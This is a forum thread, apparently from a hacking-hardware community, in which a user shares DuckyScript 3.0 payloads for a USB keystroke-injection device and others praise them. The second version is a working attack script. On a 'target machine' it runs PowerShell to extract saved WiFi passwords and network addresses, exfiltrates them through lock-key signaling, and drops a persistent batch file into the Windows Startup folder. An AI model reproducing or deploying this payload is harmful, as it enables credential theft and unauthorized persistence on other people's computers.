RootJunky Posted August 22, 2022 Share Posted August 22, 2022 REM Three Payloads from LOCK Key Double Press. REM Author RootJunky REM COMPATABILITY: REM DuckyScript 3.0 REM SCROLLLOCK FUNCTION FUN1() WAIT_FOR_SCROLL_CHANGE STRING Scrolllock pressed ENTER END_FUNCTION REM NUMLOCK FUNCTION FUN2() WAIT_FOR_NUM_CHANGE STRING Numlock pressed ENTER END_FUNCTION REM CAPSLOCK FUNCTION FUN3() WAIT_FOR_CAPS_CHANGE STRING Capslock pressed ENTER END_FUNCTION REM place all lock keys in the off state to start the payload correctly. SAVE_HOST_KEYBOARD_LOCK_STATE DELAY 500 IF ( $_NUMLOCK_ON == TRUE ) THEN NUMLOCK DELAY 500 END_IF IF ( $_SCROLLLOCK_ON == TRUE ) THEN SCROLLLOCK DELAY 500 END_IF IF ( $_CAPSLOCK_ON == TRUE ) THEN CAPSLOCK DELAY 500 END_IF REM Constantly monitor scrolllock, numlock, and capslock keys with a while loop. WHILE TRUE REM Call FUNCTION 1 with scrolllock press. IF ($_SCROLLLOCK_ON == TRUE) THEN FUN1() REM Call FUNCTION 2 with numlock press. ELSE IF ($_NUMLOCK_ON == TRUE) THEN FUN2() REM Call FUNCTION 3 with capslock press. ELSE IF ($_CAPSLOCK_ON == TRUE) THEN FUN3() END_IF END_WHILE This is a fun little menu system I wrote that allows you to use the lock keys to select from 3 different payloads. Just double press capslock. numlock, or scrolllock to select the payload you want to run on the target machine. Using this method you are still able to use the button on the rubber ducky to place it in USB Storage mode. I would attach a inject.bin file but there is no point as you will want to add your payloads to each of the functions 1, 2, and 3. NOTE if the button on the ducky does not respond it is because you are waiting for another button press and normally a numlock will clear it and then you can mount usb storage. RootJunky 1 Quote Link to comment Share on other sites More sharing options...
RootJunky Posted September 2, 2022 Author Share Posted September 2, 2022 REM Three Payloads from LOCK Key Double Press. REM Author: RootJunky REM COMPATABILITY: Windows REM DuckyScript 3.0 REM set password DEFINE PASS mypassword REM Stop and Start the while loop during payload execution with VAR 1 and 2. VAR $stopstart = 1 REM SCROLLLOCK Payload FUNCTION FUN1() $stopstart = 2 WAIT_FOR_SCROLL_CHANGE DELAY 1000 STRING PASS ENTER LED_R DELAY 1000 LED_OFF $stopstart = 1 END_FUNCTION REM NUMLOCK Payload FUNCTION FUN2() $stopstart = 2 WAIT_FOR_NUM_CHANGE DELAY 500 GUI r DELAY 1000 STRING Powershell DELAY 500 ENTER DELAY 1000 STRING $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content ENTER STRING $PublicIP = "Your-Public-IP-Address" ENTER STRING $LocalIP = "Your-Local-IP-Address" ENTER STRING $computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1} ENTER STRING $Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled} ENTER STRING $Wifi = (netsh wlan show profiles) | Select-String ":(.+)$" | % {$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | % {$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize ENTER STRING $Wifi + $PublicIP + $computerPubIP + $LocalIP + $Networks.ipaddress[0] > $env:tmp\z ENTER STRING clear ENTER SAVE_HOST_KEYBOARD_LOCK_STATE STRING $Wifi + $PublicIP + $computerPubIP + $LocalIP + $Networks.ipaddress[0] + (echo "Press NUMLOCK now to EXFIL this data, you have 5 seconds.") ENTER STRING timeout 5 ENTER DELAY 6000 STRING EXIT REM This only runs if NUMLOCK is press in the 5 second window. IF $_NUMLOCK_ON THEN $_EXFIL_MODE_ENABLED = TRUE $_EXFIL_LEDS_ENABLED = TRUE REM Convert the stored credentials into CAPSLOCK and NUMLOCK values. GUI r DELAY 100 STRING powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80, STRING 0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else STRING {$o+='%{CAPSLOCK}'}}};$o+='%{SCROLLLOCK}';echo $o >$env:tmp\z" ENTER DELAY 100 REM Use powershell to inject the CAPSLOCK and NUMLOCK values to the Ducky. GUI r DELAY 100 STRING powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms; STRING [System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z" ENTER DELAY 100 REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete. WAIT_FOR_SCROLL_CHANGE LED_G $_EXFIL_MODE_ENABLED = FALSE RESTORE_HOST_KEYBOARD_LOCK_STATE END_IF LED_R DELAY 1000 LED_OFF $stopstart = 1 END_FUNCTION REM Capslock payload FUNCTION FUN3() $stopstart = 2 WAIT_FOR_CAPS_CHANGE DELAY 500 GUI r DELAY 500 STRING cmd DELAY 500 ENTER DELAY 1000 STRING ECHO echo off > "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat" DELAY 500 ENTER STRING ECHO mode con:cols=30 lines=10 >> "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat" DELAY 500 ENTER STRING ECHO start https://youtu.be/sXwaRjU7Tj0?t=57 >> "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat" DELAY 500 ENTER STRING ECHO exit >> "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\rickroll.bat" DELAY 500 ENTER STRING exit ENTER LED_R DELAY 1000 LED_OFF $stopstart = 1 END_FUNCTION REM place all lock keys in the off state to start the payload correctly. FUNCTION SETUP() SAVE_HOST_KEYBOARD_LOCK_STATE DELAY 500 IF ( $_NUMLOCK_ON == TRUE ) THEN NUMLOCK DELAY 500 END_IF IF ( $_SCROLLLOCK_ON == TRUE ) THEN SCROLLLOCK DELAY 500 END_IF IF ( $_CAPSLOCK_ON == TRUE ) THEN CAPSLOCK DELAY 500 END_IF END_FUNCTION REM SCROLLLOCK on to enable button description on ducky startup. SAVE_HOST_KEYBOARD_LOCK_STATE DELAY 1000 IF ( $_SCROLLLOCK_ON == TRUE ) THEN DELAY 500 GUI r DELAY 1000 STRING powershell DELAY 500 ENTER DELAY 1000 STRING $groups = ('CAPSLOCK = RickRoll','SCROLLLOCK = Password','NUMLOCK = WiFi Password and EXFIL','Double press any of these keys to run the payloads.') ENTER STRING $groups = $groups -join "`n- " ENTER STRING powershell -WindowStyle hidden -Command "& {[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('- $groups','DUCKY USAGE')}" ENTER SETUP() ELSE IF SETUP() END_IF REM Constantly monitor scrolllock, numlock, and capslock keys with a while loop. WHILE ( $stopstart == 1 ) REM Call FUNCTION 1 with scrolllock press. IF ($_SCROLLLOCK_ON == TRUE) THEN FUN1() REM Call FUNCTION 2 with numlock press. ELSE IF ($_NUMLOCK_ON == TRUE) THEN FUN2() REM Call FUNCTION 3 with capslock press. ELSE IF ($_CAPSLOCK_ON == TRUE) THEN FUN3() END_IF END_WHILE Version 2 includes some payloads for fun and a mid payload option to enable exfil of wifi passwords and ssid if wanted. Also if you turn on scroll lock before plugging in the ducky it will give you a popup with Ducky usage instructions but only if scroll lock is turned on when plugging it into the PC. Just having fun using as many Ducky script 3.0 options as I can in this payload. Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 4, 2022 Share Posted September 4, 2022 Fantastic. Love the creativity. You should totally submit a pull request to https://github.com/hak5/usbrubberducky-payloads 1 Quote Link to comment Share on other sites More sharing options...
RootJunky Posted September 4, 2022 Author Share Posted September 4, 2022 (edited) 15 hours ago, Darren Kitchen said: Fantastic. Love the creativity. You should totally submit a pull request to https://github.com/hak5/usbrubberducky-payloads Done :-) Glad you like it. I had fun creating it. Adding those lock keys to ducky script 3.0 changes everything and the exfil is super cool even through it takes a long time. Edited September 4, 2022 by RootJunky Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.